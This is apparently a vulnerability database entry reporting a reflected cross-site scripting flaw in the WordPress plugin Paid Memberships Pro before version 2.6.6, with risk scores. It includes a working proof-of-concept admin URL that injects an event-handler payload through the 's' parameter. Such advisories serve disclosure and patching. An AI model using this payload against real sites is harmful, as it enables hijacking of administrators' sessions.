Lucene search

K
wpexploitJrXnmWPEX-ID:FC011990-4EC1-4553-901D-4FF1F482CB79
HistoryNov 23, 2021 - 12:00 a.m.

Paid Memberships Pro < 2.6.6 - Reflected Cross-Site Scripting

2021-11-2300:00:00
JrXnm
189

0.001 Low

EPSS

Percentile

41.5%

The plugin does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

https://example.com/wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

0.001 Low

EPSS

Percentile

41.5%

Related for WPEX-ID:FC011990-4EC1-4553-901D-4FF1F482CB79